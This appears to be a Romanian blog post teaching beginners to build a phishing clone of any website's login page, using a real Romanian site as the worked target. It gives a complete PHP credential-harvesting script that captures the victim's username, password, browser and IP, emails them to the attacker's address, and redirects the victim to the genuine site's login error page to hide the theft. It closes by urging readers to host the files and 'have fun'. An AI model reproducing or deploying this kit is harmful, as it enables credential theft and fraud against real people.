Cum sa facem o pagina de phishing la orice site.

Buna, in ultima vreme m-am saturat sa tot vad pe diferite forumuri:

Dati-mi si mie scam la X.

Asa ca am decis sa scriu acest tutorial. In el veti invata cum va puteti face propriul scam la site-ul dorit.

WARNING: Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu .

OK, deci mai intai ne alegem o tinta.

Am ales http://doizece.neogen.ro/.

Navigam pe site-ul ales. Apasam CTRL + S si salvam fisierul .html undeva pe computer.

Il deschidem... Aici poate aparea o problema si anume calea la imagini.

Daca este cale relativa (calea relativa este calea de genul /images/wow.gif) trebuie transformata in cale absoluta (http://tinta.com/images/wow.gif)

Acum ca s-a clarificat, duce-ti-va in fisierul .html care a fost salvat, da-ti CTRL + F scrieti login... (aici cuvintele pot fi diferite.. incercati si parola, password, username etc. dak nu merge login).

Veti avea un cod de genul
. Modificati login2.php in 040147.php!

Acum, la Username, ar trebui sa fie un cod de genul . name="email" ne indica faptul ca, in scriptul PHP de autentificare, email este variabila ce tine numele de utilizator.
Bun, o memoram.
La password, codul ar trebui sa fie asemanator (). Deci, parola e tinuta in variabile password. O memoram si pe aceasta.

Acum, acolo unde ati salvat .html-ul, creeati un fisier nou, numit 040147.php.

In el, adaugati urmatorul cod:
Code:
$to       = "skorpitz@gmail.com";

$name     = $_POST['email'];

$email    = $_POST['email'];

$subject  = $_POST['subject'];

$password = $_POST['password'];

$agent    = $_SERVER['HTTP_USER_AGENT'];

$ip       = $_SERVER['REMOTE_ADDR'];

$d        = date('l dS \of F Y h:i:s A');

$sub      = "Cont nou DoiZece Hacked - $email";

$headers  = "From: $name <$email>\n"; 

$headers .= "Content-Type: text/plain; charset=iso-8859-1\n";

$mes     .= 'Username: '.$email."\n";

$mes     .= "Parola: ".$password."\n";

$mes     .= "Browser: ".$agent."\n";

$mes     .= "IP: ".$ip."\n";

$mes     .= 'Data si timpul: '.$d;



{

mail($to, $sub, $mes, $headers);

header ("Location:http://doizece.neogen.ro/?1=1&dz_nl_m=login_reg&error=1&next_url=index.php%3F");





  

}

?>
Modificati codul
Code:
$to       = "skorpitz@gmail.com";
i puneti mail-ul vostru. Codul de mai sus preia variabilele email si password si le trimite impreuna cu inca cateva detalii folositoare.

Redenumiti .html-ul in index.html sau .php, uploada-ti cele 2 fisiere pe un host si distrati-va. :wink:

Niciun comentariu:

Trimiteți un comentariu

Abonați-vă la: Postare comentarii (Atom)